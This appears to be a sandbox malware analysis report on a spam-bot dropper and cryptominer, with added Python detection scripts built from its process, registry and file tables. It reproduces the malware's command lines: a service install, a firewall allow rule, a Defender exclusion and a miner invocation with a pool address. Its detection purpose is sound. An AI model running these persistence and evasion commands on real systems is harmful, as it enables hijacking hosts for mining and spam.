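The process records above carry the whole installation chain in their command lines: a service created with `sc create` whose binPath smuggles the dropper's own desktop path in a `/d"..."` argument, a `netsh advfirewall` inbound allow rule for `svchost.exe`, an executable moved from `%TEMP%` into a freshly created `System32` subdirectory, and two `svchost.exe` instances whose parent is not `services.exe` (one launched by `dcsovrw.exe`, one by the other `svchost.exe` with a stratum pool and algorithm on its command line). Two details are worth reading with care: the first `wusa.exe` (PID 2072) exits with 3221226540, which is NTSTATUS 0xC000042C (STATUS_ELEVATION_REQUIRED), and every later child runs at HIGH integrity while the dropper itself is MEDIUM; because this task had "Autoconfirmation of UAC" switched on, that elevation does not by itself demonstrate a prompt-less UAC bypass. Note also that `netsh.exe` exits with code 1 and its recorded command line ends in a literal `>nul`, a redirection token only a shell would interpret, which is consistent with the argument string having been passed straight to `CreateProcess`.

The script below is an added example, not ANY.RUN code, turning those observations into process-creation rules and running them over events constructed from the table above (integrity levels and exit codes as listed there). Rule wording and the integrity ranking are the author's choices.

```python
"""Rule-based triage of process-creation events.

Added example for this report (not ANY.RUN code). The rules encode the behaviour
in the process table above; the events are constructed from that table, with the
integrity levels and exit codes it lists. Thresholds and wording are the author's.
"""
import re
from dataclasses import dataclass
from typing import Optional

STATUS_ELEVATION_REQUIRED = 0xC000042C   # decimal 3221226540, the exit code of wusa.exe PID 2072
INTEGRITY_RANK = {"LOW": 0, "MEDIUM": 1, "HIGH": 2, "SYSTEM": 3}
MINER_RE = re.compile(r"stratum\+(?:tcp|ssl)://|cryptonight|--nicehash")


@dataclass
class ProcEvent:
    pid: int
    image: str                       # full path of the new process
    cmdline: str
    parent: str = ""                 # image name of the parent, "" when not recorded
    integrity: str = "MEDIUM"
    parent_integrity: Optional[str] = None
    exit_code: Optional[int] = None


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(ev: ProcEvent) -> list:
    """Return the rule hits for one event; an empty list means nothing notable."""
    hits = []
    name = basename(ev.image)
    cl = ev.cmdline.lower()
    if name == "svchost.exe":
        if ev.parent.lower() != "services.exe":
            hits.append(f"svchost.exe started by {ev.parent or 'unknown'} instead of services.exe")
        if not re.search(r"\s-k\s+\w+", cl):
            hits.append("svchost.exe without a '-k <group>' argument")
        if MINER_RE.search(cl):
            hits.append("miner-style arguments (stratum pool / algorithm flags)")
    if name == "sc.exe" and re.search(r"\bcreate\b", cl) and "c:\\users\\" in cl:
        hits.append("sc create: binPath references a user-profile path")
    if name == "netsh.exe" and "advfirewall" in cl and "add rule" in cl and "action=allow" in cl:
        hits.append("netsh: firewall allow rule added")
        if re.search(r'program="?c:\\windows\\system32\\', cl):
            hits.append("netsh: allow rule targets a Windows system binary")
    if name == "cmd.exe" and re.search(r'\bmove\b.*\\temp\\[^"]*\.exe.*c:\\windows\\', cl):
        hits.append("cmd: executable moved from Temp into the Windows directory")
    if ev.parent_integrity and INTEGRITY_RANK.get(ev.integrity, 0) > INTEGRITY_RANK.get(ev.parent_integrity, 0):
        hits.append(f"integrity {ev.integrity} is above the parent's {ev.parent_integrity}")
    if ev.exit_code == STATUS_ELEVATION_REQUIRED:
        hits.append("exit code 0xC000042C (STATUS_ELEVATION_REQUIRED)")
    return hits


def triage_all(events) -> dict:
    """Map PID -> hits for every event that produced at least one hit."""
    out = {}
    for ev in events:
        hits = triage(ev)
        if hits:
            out[ev.pid] = hits
    return out


SAMPLE = r"C:\Users\admin\Desktop\9acfb27a482a0ac42cd9caf72a24545c.exe"
PARENT = "9acfb27a482a0ac42cd9caf72a24545c.exe"
EVENTS = [  # constructed from the process table above
    ProcEvent(3496, SAMPLE, f'"{SAMPLE}"', "", "MEDIUM", None, 0),
    ProcEvent(2072, r"C:\Windows\System32\wusa.exe", r'"C:\Windows\System32\wusa.exe"', PARENT, "MEDIUM", "MEDIUM", 3221226540),
    ProcEvent(1984, r"C:\Windows\System32\wusa.exe", r'"C:\Windows\System32\wusa.exe"', PARENT, "HIGH", "MEDIUM", 0),
    ProcEvent(1360, r"C:\Windows\system32\cmd.exe", r"cmd /C mkdir C:\Windows\system32\kbexvctd" + "\\", PARENT, "HIGH", "MEDIUM", 0),
    ProcEvent(3464, r"C:\Windows\system32\cmd.exe",
              r'cmd /C move /Y "C:\Users\admin\AppData\Local\Temp\dcsovrw.exe" C:\Windows\system32\kbexvctd' + "\\",
              PARENT, "HIGH", "MEDIUM", 0),
    ProcEvent(700, r"C:\Windows\system32\sc.exe",
              r'sc create kbexvctd binPath= "C:\Windows\system32\kbexvctd\dcsovrw.exe /d\"' + SAMPLE
              + r'\"" type= own start= auto DisplayName= "wifi support"', PARENT, "HIGH", "MEDIUM", 0),
    ProcEvent(3000, r"C:\Windows\system32\sc.exe", 'sc description kbexvctd "wifi internet conection"', PARENT, "HIGH", "MEDIUM", 0),
    ProcEvent(3568, r"C:\Windows\system32\sc.exe", "sc start kbexvctd", PARENT, "HIGH", "MEDIUM", 0),
    ProcEvent(3264, r"C:\Windows\system32\netsh.exe",
              r'netsh advfirewall firewall add rule name="Host-process for services of Windows" dir=in '
              r'action=allow program="C:\Windows\system32\svchost.exe" enable=yes>nul', PARENT, "HIGH", "MEDIUM", 1),
    ProcEvent(3824, r"C:\Windows\system32\kbexvctd\dcsovrw.exe",
              r'C:\Windows\system32\kbexvctd\dcsovrw.exe /d"' + SAMPLE + '"', "", "SYSTEM", None, 0),
    ProcEvent(2640, r"C:\Windows\system32\svchost.exe", "svchost.exe", "dcsovrw.exe", "SYSTEM", "SYSTEM"),
    ProcEvent(2164, r"C:\Windows\system32\svchost.exe",
              "svchost.exe -a cryptonight-heavy -o stratum+tcp://185.16.41.185:8087 -u w1 -p x --nicehash --safe",
              "svchost.exe", "SYSTEM", "SYSTEM"),
]

if __name__ == "__main__":
    for pid, hits in triage_all(EVENTS).items():
        print(pid, "->", "; ".join(hits))
```

The parent check is the one rule that survives contact with a real fleet: a genuine `svchost.exe` is always a child of `services.exe` and always carries `-k <group>`, so both PID 2640 and PID 2164 fail it regardless of what else is on the command line. The remaining rules are narrower and are best treated as enrichment on top of that anchor.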

Registry activity

Total events
159
Read events
94
Write events
65
Delete events
0

Modification events

PID | Process | Operation | Key | Name | Value
3496 | 9acfb27a482a0ac42cd9caf72a24545c.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0
3496 | 9acfb27a482a0ac42cd9caf72a24545c.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 1
2640 | svchost.exe | write | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\kbexvctd | ImagePath | C:\Windows\system32\kbexvctd\dcsovrw.exe
2640 | svchost.exe | write | HKEY_USERS\.DEFAULT\Control Panel\Buses | Config0 | ––
2640 | svchost.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\kbexvctd | 0
3264 | netsh.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E | LanguageList | en-US
3264 | netsh.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E | @%SystemRoot%\system32\dhcpqec.dll,-100 | DHCP Quarantine Enforcement Client
3264 | netsh.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E | @%SystemRoot%\system32\dhcpqec.dll,-101 | Provides DHCP based enforcement for NAP
3264 | netsh.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E | @%SystemRoot%\system32\dhcpqec.dll,-103 | 1.0
3264 | netsh.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E | @%SystemRoot%\system32\dhcpqec.dll,-102 | Microsoft Corporation
3264 | netsh.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E | @%SystemRoot%\system32\napipsec.dll,-1 | IPsec Relying Party
3264 | netsh.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E | @%SystemRoot%\system32\napipsec.dll,-2 | Provides IPsec based enforcement for Network Access Protection
3264 | netsh.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E | @%SystemRoot%\system32\napipsec.dll,-4 | 1.0
3264 | netsh.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E | @%SystemRoot%\system32\napipsec.dll,-3 | Microsoft Corporation
3264 | netsh.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E | @%SystemRoot%\system32\tsgqec.dll,-100 | RD Gateway Quarantine Enforcement Client
3264 | netsh.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E | @%SystemRoot%\system32\tsgqec.dll,-101 | Provides RD Gateway enforcement for NAP
3264 | netsh.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E | @%SystemRoot%\system32\tsgqec.dll,-102 | 1.0
3264 | netsh.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E | @%SystemRoot%\system32\tsgqec.dll,-103 | Microsoft Corporation
3264 | netsh.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E | @%SystemRoot%\system32\eapqec.dll,-100 | EAP Quarantine Enforcement Client
3264 | netsh.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E | @%SystemRoot%\system32\eapqec.dll,-101 | Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies.
3264 | netsh.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E | @%SystemRoot%\system32\eapqec.dll,-102 | 1.0
3264 | netsh.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E | @%SystemRoot%\system32\eapqec.dll,-103 | Microsoft Corporation

Files activity

Executable files
2
Suspicious files
10
Text files
0
Unknown types
0

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
3496 | 9acfb27a482a0ac42cd9caf72a24545c.exe | C:\Users\admin\AppData\Local\Temp\dcsovrw.exe | executable | 8d018a080771c65ab442b208322a2454 | 803f94981a4f58b7d69bdf8578a79327f4583f1b33d3fb9640f20e2df9f354e7
3464 | cmd.exe | C:\Windows\system32\kbexvctd\dcsovrw.exe | executable | 8d018a080771c65ab442b208322a2454 | 803f94981a4f58b7d69bdf8578a79327f4583f1b33d3fb9640f20e2df9f354e7
2640 | svchost.exe | C:\Windows\system32\config\systemprofile:.repos | binary | 769942f632e9207800e4d40b169785d9 | bcd1ce6bb1f16cd687b201bead0937ed76177ed4e10aa511c5d24b960a7d3be6
2640 | svchost.exe | C:\Windows\system32\config\systemprofile:.repos | binary | 1c3f901e5ca5ea0c8f472cc7b493afd6 | 248dcefe5f597508ee2695b6d568611f965fa8d7b4a87c300a9a7b7105358356
2640 | svchost.exe | C:\Windows\system32\config\systemprofile:.repos | binary | 54e914d8f0375b980cecaff6b29ac104 | a6711840fe4cd5ea77da71b0352a9890a7e16b588af0d8cfffe15457eae661a2
2640 | svchost.exe | C:\Windows\system32\config\systemprofile:.repos | binary | b271c55a5bbf76acdc36a365dce91609 | 87de2e128f1c47035a6db72e6109658c5a1f4d3f724f69bab07b79b69e4355f6
2640 | svchost.exe | C:\Windows\system32\config\systemprofile:.repos | binary | 48bd5a9ca2124d6b856cd8c4add84e5d | 51e799d479b7b39085b6dbbe721d1686f9b4ed756d971bb0378aca2495e6ef1c
2640 | svchost.exe | C:\Windows\system32\config\systemprofile:.repos | binary | ae4c3770bcb49ae4ddf32dd2730462a2 | cbcaeb29f66a447b3d44cda2b56f350ea99856316eee2394968478c95edf457d
2640 | svchost.exe | C:\Windows\system32\config\systemprofile:.repos | binary | 94aae6c8a48b581642701de84d341367 | 4756e44f638840d439181a9f917359ee617f958acc5ad436200bcc32a1c29dd7
2640 | svchost.exe | C:\Windows\system32\config\systemprofile:.repos | binary | 8707dbf8f875af75bf69183cea6781bf | 9a864a163f551fe3fe3bb403c14219c315f0365cdfd249b4e4b96ad3f6f0b793
2640 | svchost.exe | C:\Windows\system32\config\systemprofile:.repos | binary | 7c120e6e4809accabab05e3712c653e2 | e1f75fddaa9bc79199f585eb0a5fe6c7ec9e1050da8da0d050605f53f991dcfb
2640 | svchost.exe | C:\Windows\system32\config\systemprofile:.repos | binary | 691ded4d1e76fe0ed5c186ce5d3fd3e3 | af3dfb9b2a0aba25efb05036f03f53364fe984435a60176df1e0184c2196ee68
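
Three of the registry and file records above are the ones a responder should key on: the Windows Defender exclusion for `C:\Windows\system32\kbexvctd` (the directory the service binary was moved into), the `ImagePath` of the `kbexvctd` service being written by a `svchost.exe` rather than by `services.exe`, and the `Config0` blob under `HKEY_USERS\.DEFAULT\Control Panel\Buses`, written by the same PID the sandbox tagged TOFSEE. The dropped-file list shows a second trick: the path `C:\Windows\system32\config\systemprofile:.repos` is not a file but an NTFS alternate data stream named `.repos` attached to the `systemprofile` directory, rewritten ten times with different contents (ten distinct hashes). The script below is an added example, not ANY.RUN code: it classifies registry writes into those three findings (ignoring the MuiCache noise from `netsh.exe`), detects ADS paths by the second colon, and counts how many distinct contents each path received. Records are copied from the tables above; the `Config0` value is not reproduced on this page and is marked as such.

```python
"""Registry-write and dropped-file triage.

Added example for this report (not ANY.RUN code). Classifies the registry writes
listed above and detects NTFS alternate data streams in dropped-file paths.
Sample records are copied from the tables above; the Config0 value is not shown
on the page, so a placeholder string stands in for it.
"""
import re
from collections import defaultdict
from typing import Optional

DEFENDER_EXCL_RE = re.compile(r"\\windows defender\\exclusions\\(paths|processes|extensions|temporarypaths)$", re.I)
SERVICE_KEY_RE = re.compile(r"\\(?:controlset\d{3}|currentcontrolset)\\services\\([^\\]+)$", re.I)
BUSES_RE = re.compile(r"\\control panel\\buses$", re.I)
ADS_RE = re.compile(r"^([A-Za-z]:\\.*?):([^\\/:]+)$")   # drive colon, then a second colon before the stream name


def classify_registry_write(process: str, key: str, name: str, value: str) -> Optional[str]:
    """Return a finding for one registry write, or None for writes not worth surfacing."""
    if DEFENDER_EXCL_RE.search(key):
        return f"Windows Defender exclusion added ({key.rsplit(chr(92), 1)[-1]}): {name}"
    m = SERVICE_KEY_RE.search(key)
    if m and name.lower() == "imagepath" and process.lower() != "services.exe":
        return f"service {m.group(1)} ImagePath set by {process}: {value}"
    if BUSES_RE.search(key):
        return f"config blob written under Control Panel\\Buses ({name}) by {process}"
    return None


def ads_stream(path: str):
    """Split 'C:\\dir\\name:stream' into (path, stream); None for a plain path."""
    m = ADS_RE.match(path)
    return (m.group(1), m.group(2)) if m else None


def rewrite_counts(dropped) -> dict:
    """Number of distinct contents (by SHA256) written to each path."""
    seen = defaultdict(set)
    for _pid, _proc, path, _kind, sha256 in dropped:
        seen[path].add(sha256)
    return {p: len(h) for p, h in seen.items()}


def triage(registry, dropped) -> dict:
    """Findings from both tables: registry hits, ADS paths, and per-path rewrite counts."""
    reg = [f for f in (classify_registry_write(*r[1:]) for r in registry) if f]
    ads = sorted({p for _pid, _proc, p, _k, _h in dropped if ads_stream(p)})
    return {"registry": reg, "ads": ads, "rewrites": rewrite_counts(dropped)}


SAMPLE = "9acfb27a482a0ac42cd9caf72a24545c.exe"
REGISTRY = [  # (pid, process, key, name, value), from the modification-events table above
    (3496, SAMPLE, r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap", "UNCAsIntranet", "0"),
    (2640, "svchost.exe", r"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\kbexvctd", "ImagePath", r"C:\Windows\system32\kbexvctd\dcsovrw.exe"),
    (2640, "svchost.exe", r"HKEY_USERS\.DEFAULT\Control Panel\Buses", "Config0", "<binary value not shown in the report>"),
    (2640, "svchost.exe", r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths", r"C:\Windows\system32\kbexvctd", "0"),
    (3264, "netsh.exe", r"HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E", "LanguageList", "en-US"),
]
ADS_PATH = r"C:\Windows\system32\config\systemprofile:.repos"
DROPPED = [  # (pid, process, path, type, sha256), from the dropped-files table above
    (3496, SAMPLE, r"C:\Users\admin\AppData\Local\Temp\dcsovrw.exe", "executable", "803f94981a4f58b7d69bdf8578a79327f4583f1b33d3fb9640f20e2df9f354e7"),
    (3464, "cmd.exe", r"C:\Windows\system32\kbexvctd\dcsovrw.exe", "executable", "803f94981a4f58b7d69bdf8578a79327f4583f1b33d3fb9640f20e2df9f354e7"),
] + [(2640, "svchost.exe", ADS_PATH, "binary", h) for h in (
    "bcd1ce6bb1f16cd687b201bead0937ed76177ed4e10aa511c5d24b960a7d3be6",
    "248dcefe5f597508ee2695b6d568611f965fa8d7b4a87c300a9a7b7105358356",
    "a6711840fe4cd5ea77da71b0352a9890a7e16b588af0d8cfffe15457eae661a2",
    "87de2e128f1c47035a6db72e6109658c5a1f4d3f724f69bab07b79b69e4355f6",
    "51e799d479b7b39085b6dbbe721d1686f9b4ed756d971bb0378aca2495e6ef1c",
    "cbcaeb29f66a447b3d44cda2b56f350ea99856316eee2394968478c95edf457d",
    "4756e44f638840d439181a9f917359ee617f958acc5ad436200bcc32a1c29dd7",
    "9a864a163f551fe3fe3bb403c14219c315f0365cdfd249b4e4b96ad3f6f0b793",
    "e1f75fddaa9bc79199f585eb0a5fe6c7ec9e1050da8da0d050605f53f991dcfb",
    "af3dfb9b2a0aba25efb05036f03f53364fe984435a60176df1e0184c2196ee68",
)]

if __name__ == "__main__":
    result = triage(REGISTRY, DROPPED)
    for f in result["registry"]:
        print("registry:", f)
    for p in result["ads"]:
        print("ADS:", ads_stream(p), "rewritten", result["rewrites"][p], "times")
```

On a live host the same stream can be enumerated with `dir /r C:\Windows\system32\config` or `Get-Item -Stream *`; a plain `dir` will not show it, which is why the hunt must go through the dropped-file telemetry or an explicit stream listing.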


Network activity

HTTP(S) requests
12
TCP/UDP connections
269
DNS requests
179
Threats
19

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2640 | svchost.exe | GET | 302 | 216.58.207.36:80 | http://www.google.com/ | US | html | –– | whitelisted
2640 | svchost.exe | GET | 302 | 216.58.207.36:80 | http://www.google.com/ | US | html | –– | whitelisted
–– | –– | GET | 200 | 216.146.43.70:80 | http://checkip.dyndns.org/ | US | html | –– | shared
2640 | svchost.exe | HEAD | 200 | 216.239.38.21:80 | http://ipinfo.io/ip | US | –– | –– | shared
2640 | svchost.exe | GET | 200 | 93.171.200.64:35000 | http://api.pr-cy.ru:35000/ | RU | binary | –– | unknown
2640 | svchost.exe | GET | 302 | 191.252.119.205:80 | http://consultorcuidemais.com.br/wp-login.php?action=register | BR | html | –– | unknown
2640 | svchost.exe | GET | –– | 191.252.119.205:80 | http://consultorcuidemais.com.br/ | BR | –– | –– | unknown
2640 | svchost.exe | GET | –– | 66.171.248.178:80 | http://ipv4bot.whatismyipaddress.com/ | US | –– | –– | shared
2640 | svchost.exe | GET | –– | 82.98.137.34:80 | http://consultoriass.es/wp-login.php?action=register | ES | –– | –– | unknown
2640 | svchost.exe | GET | –– | 82.98.137.34:80 | http://www.consultoriass.es/wp-login.php?registration=disabled | ES | –– | –– | unknown
2640 | svchost.exe | HEAD | 200 | 216.239.38.21:80 | http://ipinfo.io/ip | US | –– | –– | shared
2640 | svchost.exe | HEAD | 200 | 216.239.38.21:80 | http://ipinfo.io/ip | US | –– | –– | shared


Connections

PID Process IP ASN CN Reputation
2640 svchost.exe 13.77.161.179:80 Microsoft Corporation US malicious
2640 svchost.exe 43.231.4.7:443 Gigabit Hosting Sdn Bhd MY malicious
2640 svchost.exe 104.47.53.36:25 Microsoft Corporation US unknown
2640 svchost.exe 98.137.159.27:25 Yahoo US unknown
2640 svchost.exe 74.125.200.26:25 Google Inc. US whitelisted
2640 svchost.exe 144.76.108.92:484 Hetzner Online GmbH DE malicious
2640 svchost.exe 212.82.101.46:25 Yahoo! UK Services Limited CH shared
2640 svchost.exe 84.2.43.65:25 Magyar Telekom plc. HU unknown
2640 svchost.exe 67.195.228.110:25 Yahoo US unknown
2640 svchost.exe 108.177.15.26:25 Google Inc. US whitelisted
2640 svchost.exe 104.44.194.235:25 Microsoft Corporation US whitelisted
2640 svchost.exe 66.218.85.139:25 Yahoo! US unknown
2640 svchost.exe 157.7.107.6:25 GMO Internet,Inc JP unknown
2640 svchost.exe 80.67.18.126:25 Host Europe GmbH DE unknown
2640 svchost.exe 153.153.62.231:25 NTT Communications Corporation JP unknown
2640 svchost.exe 213.205.33.64:25 Tiscali SpA IT unknown
2640 svchost.exe 198.82.183.88:25 Virginia Polytechnic Institute and State Univ. US unknown
2640 svchost.exe 177.153.23.241:25 Locaweb Serviços de Internet S/A BR unknown
2640 svchost.exe 185.135.90.99:25 LH.pl Sp. z o.o. PL unknown
2640 svchost.exe 213.205.33.63:25 Tiscali SpA IT unknown
2640 svchost.exe 144.76.199.2:420 Hetzner Online GmbH DE malicious
2640 svchost.exe 144.76.199.43:420 Hetzner Online GmbH DE malicious
2640 svchost.exe 85.25.119.25:420 Host Europe GmbH DE malicious
2640 svchost.exe 176.111.49.43:420 United Networks of Ukraine, Ltd UA malicious
2640 svchost.exe 46.4.52.109:420 Hetzner Online GmbH DE unknown
2640 svchost.exe 216.58.207.36:80 Google Inc. US whitelisted
2640 svchost.exe 94.100.180.104:25 Limited liability company Mail.Ru RU unknown
2640 svchost.exe 64.233.188.27:25 Google Inc. US unknown
2640 svchost.exe 104.44.194.232:25 Microsoft Corporation US whitelisted
2640 svchost.exe 104.47.125.33:25 Microsoft Corporation SG unknown
2640 svchost.exe 67.195.228.94:25 Yahoo US unknown
2640 svchost.exe 13.59.73.94:25 Amazon.com, Inc. US unknown
2640 svchost.exe 193.252.22.84:465 Orange FR unknown
2164 svchost.exe 185.16.41.185:8087 Valid Technology L.p. GB suspicious
–– –– 95.211.188.11:137 LeaseWeb Netherlands B.V. NL malicious
2640 svchost.exe 81.209.127.14:25 Elisa Oyj FI unknown
2640 svchost.exe 212.227.15.17:25 1&1 Internet SE DE unknown
2640 svchost.exe 74.125.199.27:25 Google Inc. US whitelisted
2640 svchost.exe 129.179.0.21:25 BT Americas, Inc US unknown
–– –– 216.146.43.70:80 Dynamic Network Services, Inc. US shared
2640 svchost.exe 216.58.205.227:443 Google Inc. US whitelisted
–– –– 144.76.108.92:484 Hetzner Online GmbH DE malicious
2640 svchost.exe 216.239.38.21:80 Google Inc. US whitelisted
2640 svchost.exe 98.137.159.25:25 Yahoo US unknown
2640 svchost.exe 168.95.6.61:25 Data Communication Business Group TW unknown
2640 svchost.exe 98.136.96.73:25 Yahoo US unknown
2640 svchost.exe 188.132.157.230:25 Equinix Turkey Internet Hizmetleri Anonim Sirketi TR unknown
2640 svchost.exe 108.177.14.27:25 Google Inc. US whitelisted
2640 svchost.exe 65.55.92.184:25 Microsoft Corporation US whitelisted
2640 svchost.exe 80.160.88.34:25 Tele Danmark DK unknown
2640 svchost.exe 216.58.207.36:443 Google Inc. US whitelisted
2640 svchost.exe 93.171.200.64:35000 Ddos-guard Ltd RU unknown
2640 svchost.exe 191.252.119.205:80 Locaweb Serviços de Internet S/A BR unknown
2640 svchost.exe 217.171.23.169:25 Serveurcom SRL FR unknown
2640 svchost.exe 168.95.5.112:25 Data Communication Business Group TW unknown
2640 svchost.exe 148.163.149.49:25 Proofpoint, Inc. US unknown
2640 svchost.exe 185.146.158.7:25 JSC ISPsystem RU unknown
2640 svchost.exe 98.137.159.28:25 Yahoo US unknown
2640 svchost.exe 66.171.248.178:80 Alchemy Communications, Inc. US malicious
2640 svchost.exe 180.92.199.181:25 Wholesale Services Provider AU unknown
2640 svchost.exe 202.108.6.242:25 China Unicom Beijing Province Network CN unknown
2640 svchost.exe 69.31.136.5:443 GTT Communications Inc. US suspicious
2640 svchost.exe 159.253.214.239:25 UKfastnet Ltd GB unknown
2640 svchost.exe 148.163.153.48:25 Proofpoint, Inc. US unknown
2640 svchost.exe 104.44.194.234:25 Microsoft Corporation US whitelisted
2640 svchost.exe 82.98.137.34:80 DinaHosting S.L. ES unknown
2640 svchost.exe 66.39.2.14:25 pair Networks US unknown
2640 svchost.exe 62.149.128.151:25 Aruba S.p.A. IT unknown
2640 svchost.exe 195.62.167.22:25 Lepida S.p.A. IT unknown
–– –– 216.239.38.21:80 Google Inc. US whitelisted
2640 svchost.exe 213.209.1.129:25 Italiaonline S.p.A. IT unknown
2640 svchost.exe 64.233.167.26:25 Google Inc. US whitelisted
2640 svchost.exe 202.108.5.186:465 China Unicom Beijing Province Network CN unknown
2640 svchost.exe 74.6.137.65:25 Yahoo! US unknown
2640 svchost.exe 104.47.13.33:25 Microsoft Corporation FI whitelisted
2640 svchost.exe 104.47.6.33:25 Microsoft Corporation US whitelisted
2640 svchost.exe 148.163.153.189:25 Proofpoint, Inc. US unknown
2640 svchost.exe 212.66.96.12:25 Panservice IT unknown
2640 svchost.exe 69.25.26.166:25 APPRIVER LLC US unknown
2640 svchost.exe 62.149.128.163:25 Aruba S.p.A. IT unknown
2640 svchost.exe 193.4.194.72:25 Fjarskipti ehf IS unknown
2640 svchost.exe 104.47.2.33:25 Microsoft Corporation IE whitelisted
2640 svchost.exe 67.195.228.111:25 Yahoo US unknown
2640 svchost.exe 62.211.72.32:25 Telecom Italia IT unknown
2640 svchost.exe 209.40.196.104:25 The Endurance International Group, Inc. US unknown
–– –– 65.74.168.215:25 Quality Investment Properties Sacramento, LLC US unknown

DNS requests

Domain IP Reputation
microsoft.com 13.77.161.179, 40.76.4.15, 40.112.72.205, 40.113.200.201, 104.215.148.63 whitelisted
microsoft-com.mail.protection.outlook.com 104.47.53.36 shared
yahoo.com No response whitelisted
mta5.am0.yahoodns.net 98.137.159.27, 98.137.159.24, 74.6.137.65, 98.137.159.25, 67.195.228.110, 67.195.228.111, 67.195.228.106, 98.137.159.26 unknown
google.com No response whitelisted
alt2.aspmx.l.google.com 74.125.200.26 whitelisted
11.188.211.95.dnsbl.sorbs.net No response unknown
11.188.211.95.bl.spamcop.net No response unknown
mx-eu.mail.am0.yahoodns.net 212.82.101.46, 188.125.73.87 unknown
yahoo.fr No response unknown
11.188.211.95.zen.spamhaus.org No response unknown
freemail.hu No response whitelisted
fmx.freemail.hu 84.2.43.65 unknown
minimalkraft.com No response unknown
mta6.am0.yahoodns.net 67.195.228.110, 67.195.228.94, 67.195.228.109, 66.218.85.52, 67.195.228.111, 74.6.137.65, 98.137.159.25, 98.137.159.27 unknown
11.188.211.95.sbl-xbl.spamhaus.org No response unknown
11.188.211.95.cbl.abuseat.org 127.0.0.2 unknown
mx4.hotmail.com 104.44.194.235, 104.44.194.234, 104.44.194.233, 104.44.194.232, 104.44.194.231, 65.55.37.72, 207.46.8.199, 65.55.33.135, 65.54.188.94, 65.55.37.88, 65.54.188.110, 65.55.92.152, 65.55.92.168, 65.55.37.120, 65.55.92.184, 104.44.194.237, 104.44.194.236 unknown
gmail-smtp-in.l.google.com 108.177.15.26 whitelisted
mta7.am0.yahoodns.net 66.218.85.139, 98.137.159.28, 74.6.137.63, 67.195.228.111, 74.6.137.64, 67.195.228.106, 67.195.228.109, 67.195.228.110 unknown
mx01.lolipop.jp 157.7.107.6 unknown
kognito.de No response unknown
mxlb.ispgateway.de 80.67.18.126 unknown
seagreen.ocn.ne.jp No response unknown
mfgw2.ocn.ad.jp 153.153.62.231, 153.153.62.228, 153.153.62.232, 153.153.62.229, 153.153.62.233, 153.153.62.226, 153.153.62.230, 153.153.62.227 unknown
gmail.com No response shared
etb-2.mail.tiscali.it 213.205.33.64, 213.205.33.61, 213.205.33.62, 213.205.33.63 unknown
tiscalinet.it No response unknown
inbound.smtp.vt.edu 198.82.183.88 unknown
minimal-radio.com No response unknown
vt.edu No response whitelisted
globo.com No response whitelisted
mail7.lh.pl 185.135.90.99 unknown
mx.globo.locaweb.com.br 177.153.23.241 unknown
imola.queen.it No response unknown
tiscali.it No response whitelisted
etb-3.mail.tiscali.it 213.205.33.63, 213.205.33.61, 213.205.33.62, 213.205.33.64 unknown
www.google.com 216.58.207.36 whitelisted
mxs.mail.ru 94.100.180.104, 94.100.180.31 shared
mail.ru No response whitelisted
alt3.gmail-smtp-in.l.google.com 64.233.188.27 whitelisted
mx1.hotmail.com 104.44.194.232, 104.44.194.231, 65.55.92.184, 65.55.37.72, 65.55.33.135, 65.54.188.72, 65.55.37.88, 65.55.92.136, 65.55.37.104, 65.55.92.168, 104.44.194.237, 104.44.194.236, 104.44.194.235, 104.44.194.234, 104.44.194.233 unknown
hotmail-com.olc.protection.outlook.com 104.47.125.33, 104.47.126.33 shared
hotmail.com No response malicious
minimania.com No response whitelisted
filter.racine-web.com 13.59.73.94 unknown
yahoo.de No response malicious
smtp.orange.fr 193.252.22.84, 193.252.22.86 shared
11.188.211.95.in-addr.arpa No response unknown
minimani.fi No response unknown
mx2.dmail.fi 81.209.127.14 unknown
web.de No response shared
valpo.edu No response whitelisted
mx-ha03.web.de 212.227.15.17 unknown
jumpy.it No response unknown
alt4.gmail-smtp-in.l.google.com 74.125.199.27 whitelisted
syntegra.com No response unknown
mail1.syntegra.com 129.179.0.21 unknown
www.google.co.in 216.58.205.227 whitelisted
ipinfo.io 216.239.38.21, 216.239.34.21, 216.239.36.21, 216.239.32.21 shared
minimar.com.tr No response unknown
mail.minimar.com.tr 188.132.157.230 unknown
msa.hinet.net No response unknown
konica.it No response unknown
alt2.gmail-smtp-in.l.google.com 74.125.200.26 whitelisted
